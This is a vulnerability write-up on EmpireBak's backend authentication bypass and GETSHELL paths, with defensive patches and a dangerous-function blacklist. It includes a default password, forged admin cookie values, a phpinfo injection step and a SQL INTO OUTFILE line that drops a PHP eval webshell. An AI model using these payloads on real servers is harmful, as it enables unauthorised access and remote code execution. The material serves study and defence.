EmpireBak \class\functions.php and \class\combakfun.php GETSHELL vulnerabilities

Source: Internet
Author: User

Contents:
1. Vulnerability description
2. Vulnerability trigger conditions
3. Vulnerability impact scope
4. Vulnerability code analysis
5. Defense methods
6. Attack and defense thinking

1. Vulnerability description

EmpireBak is a completely free tool designed specifically for backing up and importing large MySQL databases. It uses volume-based (split-file) backup and import, so in theory it can back up a database of any size. EmpireBak has a number of GETSHELL vulnerabilities; this article discusses the methods one by one, from entering the backend to GETSHELL.

2. Vulnerability trigger conditions

0x1: Default weak password for the backend

admin123456 // the default weak password

0x2: Forged cookie login to the backend

Authorization cookies:
ebak_bakrnd: 35y5cCnnA4Kh
ebak_bakusername: admin
ebak_baklogintime: 4070883661
// with the cookies above, admin.php can be accessed directly

Use the Firefox Tamper Data proxy to capture the request and visit the following URLs:
http://localhost/EmpireBak2010/admin.php
http://localhost/EmpireBak2010/DoSql.php

When Tamper Data pauses the request, modify the cookie value (if the request carries no cookie, add one). The specified backend page then opens directly, without logging in.
Cookie = ebak_loginebakckpass=enabled; ebak_bakrnd=35y5cCnnA4Kh; ebak_bakusername=admin; ebak_baklogintime=4070883661

0x3: Create an xx.asp directory in the backend "manage backup directory" (IIS parsing vulnerability)

GETSHELL through the IIS parsing vulnerability with an .asp directory has been fixed in the new version of the Empire backup CMS. It exists only when the target server is IIS; in practice most deployments are PHP + Apache.

0x4: Back up data and replace the contents of the directory files to GETSHELL

1. After logging in, run a backup once.
2. You can choose the directory the data is backed up into; the default is safemod.
3. After the backup is complete, go to "manage backup directory", then package and download. // all tables in the safemod directory are saved as PHP files after the backup
4. View the downloaded backup file.
5. EmpireBak's "manage backup directory" also has a "replace file content" function. Select the same directory as the one you just downloaded and click "replace file content":
http://www.xxx.com/diguo/RepFiletext.php?mypath=safemod
6. For example, replace the content of config.php.

The content of config.php:

    <?php
    $b_table = "ecs_ad_custom";
    $tb[ecs_ad_custom] = 1;
    $b_baktype = 0;
    $b_filesize = 300;
    $b_bakline = 500;
    $b_autoauf = 1;
    $b_dbname = "test";
    $b_stru = 1;
    $b_strufour = 0;
    $b_dbchar = "auto";
    $b_beover = 0;
    $b_insertf = "replace";
    $b_autofield = ",";
    $b_bakdatatype = 0;
    ?>

Replace the string $b_bakdatatype=0 with: $b_bakdatatype=0;phpinfo();
7. Open http://xxx/diguo/bdata/safemod/config.php: the phpinfo output is displayed, so GETSHELL succeeded.

0x5: Execute custom SQL and export to GETSHELL

select '<?php @eval($_POST[pass]);?>' into outfile 'c:/web root path/xiaohan.php'

3. Vulnerability impact scope

4. Vulnerability code analysis

0x1: Forged cookie login to the backend
\admin.php

    <?php
    require('class/connect.php');
    require('class/functions.php');
    // verify whether the user is logged in
    $lur = islogin();
    $loginin = $lur['username'];
    $rnd = $lur['rnd'];
    require LoadAdminTemp('eadmin.php');
    ?>

 

\class\functions.php

    // whether the user is logged in
    function islogin($uname = '', $urnd = '')
    {
        // die(var_dump($_COOKIE));
        // the attacker sets: $_COOKIE['ebak_loginebakckpass'] = "success";
        //                    $_COOKIE['ebak_baklogintime'] = "4070883661";
        /* From the configuration file /class/config.php. The root cause of the vulnerability is that
           the CMS ships with these default values:
           $set_username = "admin";
           $set_outtime = "60"; */
        global $set_username, $set_outtime;
        // obtain bakusername from the global $_COOKIE array. The attacker injects: $_COOKIE['ebak_bakusername'] = "admin";
        $username = $uname ? $uname : getcvar('bakusername');
        // obtain bakrnd from the global $_COOKIE array. The attacker injects: $_COOKIE['ebak_bakrnd'] = "35y5cCnnA4Kh";
        $rnd = $urnd ? $urnd : getcvar('bakrnd');
        if (empty($username) || empty($rnd))
        {
            printerror("NotLogin", "index.php");
        }
        // the attacker's target is login-free admin, so the username must equal $set_username here
        if ($username <> $set_username)
        {
            printerror("NotLogin", "index.php");
        }
        /* verify the cookie values: $username = admin, $rnd = 35y5cCnnA4Kh */
        Ebak_CHCookieRnd($username, $rnd);
        $time = time();
        if ($time - getcvar('baklogintime') > $set_outtime * 60)
        {
            printerror("OutLogintime", "index.php");
        }
        esetcookie("baklogintime", $time, 0);
        $lr['username'] = $username;
        $lr['rnd'] = $rnd;
        return $lr;
    }

 

\class\functions.php

    // verify the cookie authentication
    function Ebak_CHCookieRnd($username, $rnd)
    {
        /* $set_loginrnd comes from config.php; the source of the vulnerability is the default value
           $set_loginrnd = "YFfd33mV2MrKwDenkecYWZETWgUwMV"; */
        global $set_loginrnd;
        // with the default values the computed result is always: $ckpass = 119770adb578053dcb383f67a81bcbc6
        $ckpass = md5($rnd . $set_loginrnd) . '-' . $rnd . '-' . $username . '-';
        if ($ckpass <> getcvar('loginebakckpass'))
        {
            printerror("NotLogin", "index.php");
        }
    }

 

0x2: Back up data and replace the contents of the directory files to GETSHELL

\phome.php

    elseif ($phome == "RepPathFiletext")
    {
        Ebak_RepPathFiletext($_POST);
    }

 

\class\combakfun.php

    // replace file content
    function Ebak_RepPathFiletext($add)
    {
        global $bakpath;
        // path of the target directory to replace in
        $mypath = trim($add['mypath']);
        // the content to be replaced
        $oldword = Ebak_ClearAddsData($add['oldword']);
        // the new content that replaces it
        $newword = Ebak_ClearAddsData($add['newword']);
        $dozz = (int)$add['dozz'];
        if (empty($oldword) || empty($mypath))
        {
            printerror("EmptyRepPathFiletext", "history.go(-1)");
        }
        if (strstr($mypath, ".."))
        {
            printerror("NotChangeRepPathFiletext", "history.go(-1)");
        }
        $path = $bakpath . "/" . $mypath;
        if (!file_exists($path))
        {
            printerror("PathNotExists", "history.go(-1)");
        }
        $hand = @opendir($path);
        // traverse all files in the target directory
        while ($file = @readdir($hand))
        {
            $filename = $path . "/" . $file;
            if ($file != "." && $file != ".." && is_file($filename))
            {
                $value = ReadFiletext($filename);
                if ($dozz)
                {
                    // regular-expression replacement
                    $newvalue = Ebak_DoRepFiletextZz($oldword, $newword, $value);
                }
                else
                {
                    if (!stristr($value, $oldword))
                    {
                        continue;
                    }
                    $newvalue = str_replace($oldword, $newword, $value);
                }
                WriteFiletext_n($filename, $newvalue);
            }
        }
        printerror("RepPathFiletextSuccess", "RepFiletext.php");
    }

 

\class\functions.php

    // regular-expression replacement
    function Ebak_DoRepFiletextZz($oldword, $newword, $text)
    {
        $zztext = Ebak_RepInfoZZ($oldword, "empire-bak-wm.chief-phome", 0);
        // no filtering; replace directly
        $text = preg_replace($zztext, $newword, $text);
        return $text;
    }

 

0x3: Execute custom SQL and export to GETSHELL

\phome.php

    elseif ($phome == "DoExecSql")
    {
        Ebak_DoExecSql($_POST);
    }
    elseif ($phome == "DoTranExecSql")
    {
        $file = $_FILES['file']['tmp_name'];
        $file_name = $_FILES['file']['name'];
        $file_type = $_FILES['file']['type'];
        $file_size = $_FILES['file']['size'];
        Ebak_DoTranExecSql($file, $file_name, $file_type, $file_size, $_POST);
    }

 

\class\combakfun.php

    // execute SQL statements
    function Ebak_DoExecSql($add)
    {
        global $empire, $phome_db_dbname, $phome_db_ver, $phome_db_char;
        $query = $add['query'];
        if (!$query)
        {
            printerror("EmptyRunSql", "history.go(-1)");
        }
        // database
        if ($add['mydbname'])
        {
            $empire->query("use `" . $add['mydbname'] . "`");
        }
        // character set
        if ($add['mydbchar'])
        {
            DoSetDbChar($add['mydbchar']);
        }
        $query = Ebak_ClearAddsData($query);
        // call Ebak_DoRunQuery to execute the final SQL statement
        Ebak_DoRunQuery($query, $add['mydbchar'], $phome_db_ver);
        printerror("RunSqlSuccess", "DoSql.php");
    }

    // upload and execute SQL
    function Ebak_DoTranExecSql($file, $file_name, $file_type, $file_size, $add)
    {
        global $empire, $phome_db_dbname, $phome_db_ver, $phome_db_char;
        if (!$file_name || !$file_size)
        {
            printerror("NotChangeSQLFile", "history.go(-1)");
        }
        $filetype = GetFiletype($file_name);
        // check the extension
        if ($filetype != ".sql")
        {
            printerror("NotTranSQLFile", "history.go(-1)");
        }
        // upload the file
        $newfile = 'tmp/uploadsql' . time() . '.sql';
        $cp = Ebak_DoTranFile($file, $newfile);
        if (empty($cp))
        {
            printerror("TranSQLFileFail", "history.go(-1)");
        }
        $query = ReadFiletext($newfile);
        DelFiletext($newfile);
        if (!$query)
        {
            printerror("EmptyRunSql", "history.go(-1)");
        }
        // database
        if ($add['mydbname'])
        {
            $empire->query("use `" . $add['mydbname'] . "`");
        }
        // character set
        if ($add['mydbchar'])
        {
            DoSetDbChar($add['mydbchar']);
        }
        // call Ebak_DoRunQuery to execute the final SQL statement
        Ebak_DoRunQuery($query, $add['mydbchar'], $phome_db_ver);
        printerror("RunSqlSuccess", "DoSql.php");
    }

\class\functions.php

    // run SQL
    function Ebak_DoRunQuery($sql, $mydbchar, $mydbver)
    {
        $sql = str_replace("\r", "\n", $sql);
        $ret = array();
        $num = 0;
        // split into multiple statements for execution
        foreach (explode(";\n", trim($sql)) as $query)
        {
            $queries = explode("\n", trim($query));
            foreach ($queries as $query)
            {
                // skip comment lines beginning with # or --
                $ret[$num] .= $query[0] == '#' || $query[0] . $query[1] == '--' ? '' : $query;
            }
            $num++;
        }
        unset($sql);
        foreach ($ret as $query)
        {
            $query = trim($query);
            if ($query)
            {
                if (substr($query, 0, 12) == 'create table')
                {
                    mysql_query(Ebak_DoCreateTable($query, $mydbver, $mydbchar)) or die(mysql_error() . "<br>" . $query);
                }
                else
                {
                    mysql_query($query) or die(mysql_error() . "<br>" . $query);
                }
            }
        }
    }

 

5. Defense methods

0x1: Forged cookie login to the backend

From the perspective of best security practice, cookie-based login-free verification should be backed by the session mechanism.

\class\functions.php

    // set the cookie authentication
    function Ebak_SCookieRnd($username, $rnd)
    {
        // session-based verification of the login-free cookie
        session_start();
        global $set_loginrnd;
        // add a random factor
        $ckpass = md5(md5($rnd . $set_loginrnd) . '-' . $rnd . '-' . $username . '-' . mt_rand());
        // record it in the session
        $_SESSION['ckpass'] = $ckpass;
        esetcookie("loginebakckpass", $ckpass, 0);
    }

    // verify the cookie authentication
    function Ebak_CHCookieRnd($username, $rnd)
    {
        // session-based verification of the login-free cookie
        session_start();
        global $set_loginrnd;
        // get the value stored in the session
        $ckpass = $_SESSION['ckpass'];
        if ($ckpass <> getcvar('loginebakckpass'))
        {
            printerror("NotLogin", "index.php");
        }
    }
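The fix above still derives the stored value with md5 and mt_rand(), which is not a cryptographically secure generator, and compares it with <>. As an added example (not EmpireBak code), the scheme below replaces the whole md5($rnd.$set_loginrnd) construction analysed in section 4 with an HMAC over a per-installation secret, an expiry check and a constant-time comparison; the function names and the secret file path are assumptions.

```php
<?php
// Added example (not EmpireBak code): replace the md5($rnd.$set_loginrnd) cookie check with an
// HMAC over a per-installation random secret. Function names and the secret path are hypothetical.
const EBAK_LOGIN_TTL = 60 * 60; // seconds, the role $set_outtime*60 plays in islogin()

// A shared default such as $set_loginrnd is public, so anyone can recompute the cookie. Generate
// the secret once per install with a CSPRNG (mt_rand() is not one) and keep it outside the web root.
function ebak_load_secret(string $path): string
{
    if (!is_file($path)) {
        file_put_contents($path, bin2hex(random_bytes(32)), LOCK_EX);
        chmod($path, 0600);
    }
    return (string) file_get_contents($path);
}

// Issue a cookie value binding username and login time to the secret.
function ebak_issue_token(string $secret, string $username, int $loginTime): string
{
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $username)) {
        throw new InvalidArgumentException('bad username');
    }
    $payload = $username . '|' . $loginTime;
    return base64_encode($payload . '|' . hash_hmac('sha256', $payload, $secret));
}

// Verify a presented cookie value: returns the username, or null on any failure.
function ebak_verify_token(string $secret, string $token, ?int $now = null): ?string
{
    $raw = base64_decode($token, true);
    $parts = $raw === false ? [] : explode('|', $raw);
    if (count($parts) !== 3) {
        return null;
    }
    [$username, $loginTime, $mac] = $parts;
    $expected = hash_hmac('sha256', $username . '|' . $loginTime, $secret);
    if (!hash_equals($expected, $mac)) {   // constant-time; PHP's <> on strings is not
        return null;
    }
    if (($now ?? time()) - (int) $loginTime > EBAK_LOGIN_TTL) {
        return null;                       // expired, the equivalent of OutLogintime
    }
    return $username;
}

// Demo with a constructed in-memory secret; a token built with the old public default is rejected.
$secret = bin2hex(random_bytes(32));
$cookie = ebak_issue_token($secret, 'admin', time());
$forged = ebak_issue_token('YFfd33mV2MrKwDenkecYWZETWgUwMV', 'admin', time());
var_dump(ebak_verify_token($secret, $cookie), ebak_verify_token($secret, $forged));
```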

 

0x2: Back up data and replace the contents of the directory files to GETSHELL

\class\combakfun.php

    // replace file content
    function Ebak_RepPathFiletext($add)
    {
        global $bakpath;
        // path of the target directory to replace in
        $mypath = trim($add['mypath']);
        // the content to be replaced
        $oldword = Ebak_ClearAddsData($add['oldword']);
        // the new content that replaces it
        $newword = Ebak_ClearAddsData($add['newword']);
        /* filter dangerous keywords in the replacement content */
        if (preg_match("/([^a-zA-Z0-9])+(extract|parse_str|str_replace|unserialize|ob_start|require|include|array_map|preg_replace|copy|fputs|fopen|file_put_contents|file_get_contents|fwrite|eval|phpinfo|assert|base64_decode|create_function|call_user_func)+(|\()/is", $newword))
        {
            die("Request Error!");
        }
        /**/
        ...
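The keyword filter above is a blacklist on the replacement text. As an added example (not EmpireBak code), here is a version of the same operation that instead constrains where and what the feature may write: the directory name is allowlisted and resolved with realpath() inside $bakpath, and files the web server could execute are never rewritten. Function names are assumptions and the demo directory is constructed.

```php
<?php
// Added example (not EmpireBak code): a hardened RepPathFiletext handler. Names are hypothetical;
// backups live under $bakpath as in the original. EmpireBak stores dumps as .php, so the durable fix
// is to keep $bakpath outside the web root or deny script execution there; this routine also never
// rewrites files the server could execute, which is what turned the config.php edit into GETSHELL.
const EBAK_EXECUTABLE_EXT = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'inc'];
// Resolve $mypath inside $bakpath. An allowlist plus realpath() replaces strstr($mypath, ".."):
// realpath() canonicalises "..", symlinks and encoded forms before the containment check.
function ebak_resolve_backup_dir(string $bakpath, string $mypath): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $mypath)) {
        return null;
    }
    $base = realpath($bakpath);
    $dir  = realpath($bakpath . DIRECTORY_SEPARATOR . $mypath);
    if ($base === false || $dir === false || !is_dir($dir)) {
        return null;
    }
    return strpos($dir . DIRECTORY_SEPARATOR, $base . DIRECTORY_SEPARATOR) === 0 ? $dir : null;
}
// Plain-text replacement only (the $dozz path fed a user pattern to preg_replace and is dropped).
// Returns the files changed; executable and dot files are skipped rather than rewritten.
function ebak_replace_in_dir(string $bakpath, string $mypath, string $oldword, string $newword): array
{
    $dir = ebak_resolve_backup_dir($bakpath, $mypath);
    if ($dir === null || $oldword === '') {
        throw new InvalidArgumentException('NotChangeRepPathFiletext');
    }
    $changed = [];
    foreach (scandir($dir) as $file) {
        $target = $dir . DIRECTORY_SEPARATOR . $file;
        $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
        if ($file[0] === '.' || !is_file($target) || in_array($ext, EBAK_EXECUTABLE_EXT, true)) {
            continue;
        }
        $value = file_get_contents($target);
        if (stripos($value, $oldword) === false) {
            continue;
        }
        file_put_contents($target, str_replace($oldword, $newword, $value), LOCK_EX);
        $changed[] = $file;
    }
    return $changed;
}
// Demo in a constructed temp directory: the .sql dump is rewritten, config.php is left untouched.
$bak = sys_get_temp_dir() . '/ebak_demo_' . bin2hex(random_bytes(4));
mkdir($bak . '/safemod', 0700, true);
file_put_contents($bak . '/safemod/config.php', '<?php $b_bakdatatype=0; ?>');
file_put_contents($bak . '/safemod/ecs_ad_custom.sql', 'INSERT INTO ecs_ad_custom VALUES (0);');
print_r(ebak_replace_in_dir($bak, 'safemod', 'VALUES (0)', 'VALUES (1)'));
```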

 

0x3: Execute custom SQL and export to GETSHELL

\class\functions.php

    // run SQL
    function Ebak_DoRunQuery($sql, $mydbchar, $mydbver)
    {
        $sql = str_replace("\r", "\n", $sql);
        $ret = array();
        $num = 0;
        // split into multiple statements for execution
        foreach (explode(";\n", trim($sql)) as $query)
        {
            $queries = explode("\n", trim($query));
            foreach ($queries as $query)
            {
                // skip comment lines beginning with # or --
                $ret[$num] .= $query[0] == '#' || $query[0] . $query[1] == '--' ? '' : $query;
            }
            $num++;
        }
        unset($sql);
        foreach ($ret as $query)
        {
            $query = trim($query);
            if ($query)
            {
                /* SQL injection filter: refuse statements that export to a file */
                if (preg_match("/select.*.*(outfile|dumpfile)/sim", $query, $matches))
                {
                    echo "request error!" . "</br>" . $matches[0];
                    die();
                }
                /**/
                if (substr($query, 0, 12) == 'create table')
                {
                    mysql_query(Ebak_DoCreateTable($query, $mydbver, $mydbchar)) or die(mysql_error() . "<br>" . $query);
                }
                else
                {
                    mysql_query($query) or die(mysql_error() . "<br>" . $query);
                }
            }
        }
    }
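The regex above blocks the literal select ... outfile form, but the control that actually removes the file-write primitive sits on the database side: the account EmpireBak connects with should not hold the FILE privilege, and secure_file_priv should be set. As an added example (not EmpireBak code), the check below evaluates SHOW GRANTS output and the secure_file_priv value before the custom-SQL page is enabled; the function names are assumptions and the grant rows are constructed samples.

```php
<?php
// Added example (not EmpireBak code): a pre-flight gate for the DoExecSql/DoTranExecSql page.
// Function names are hypothetical; the grant rows below are constructed. In production they come
// from SHOW GRANTS FOR CURRENT_USER() and SELECT @@secure_file_priv on the EmpireBak connection.

// FILE is a global privilege, so only grants ON *.* can convey it, directly or via ALL PRIVILEGES.
function ebak_account_has_file_priv(array $grantRows): bool
{
    foreach ($grantRows as $row) {
        if (!preg_match('/^GRANT\s+(.+?)\s+ON\s+\*\.\*\s+TO\b/i', $row, $m)) {
            continue;
        }
        $privs = array_map('trim', explode(',', strtoupper($m[1])));
        if (array_intersect(['FILE', 'ALL', 'ALL PRIVILEGES'], $privs)) {
            return true;
        }
    }
    return false;
}

// secure_file_priv: NULL disables INTO OUTFILE/DUMPFILE and LOAD_FILE entirely; '' allows any path
// the mysqld process can write (the setting that makes an export into a web root possible);
// a directory limits exports to that directory.
function ebak_file_export_findings(array $grantRows, ?string $secureFilePriv): array
{
    $findings = [];
    if (ebak_account_has_file_priv($grantRows)) {
        $findings[] = 'account holds FILE: revoke it (or replace ALL PRIVILEGES) for the EmpireBak user';
    }
    if ($secureFilePriv === '') {
        $findings[] = 'secure_file_priv is empty: set it to NULL or to a directory outside the web root';
    } elseif ($secureFilePriv !== null) {
        $findings[] = "exports limited to $secureFilePriv: make sure that directory is not web-served";
    }
    return $findings;
}

// Refuse to expose the custom-SQL feature until the account cannot write files at all.
function ebak_allow_custom_sql(array $grantRows, ?string $secureFilePriv): bool
{
    return !ebak_account_has_file_priv($grantRows) && $secureFilePriv !== '';
}

// Constructed sample: root with ALL PRIVILEGES (the usual insecure setup) versus a dedicated account.
$root = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"];
$ebak = ["GRANT USAGE ON *.* TO 'ebak'@'localhost'",
         "GRANT SELECT, INSERT, CREATE, DROP, ALTER, LOCK TABLES ON `shop`.* TO 'ebak'@'localhost'"];
print_r(ebak_file_export_findings($root, ''));
var_dump(ebak_allow_custom_sql($root, ''), ebak_allow_custom_sql($ebak, null));
```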

 

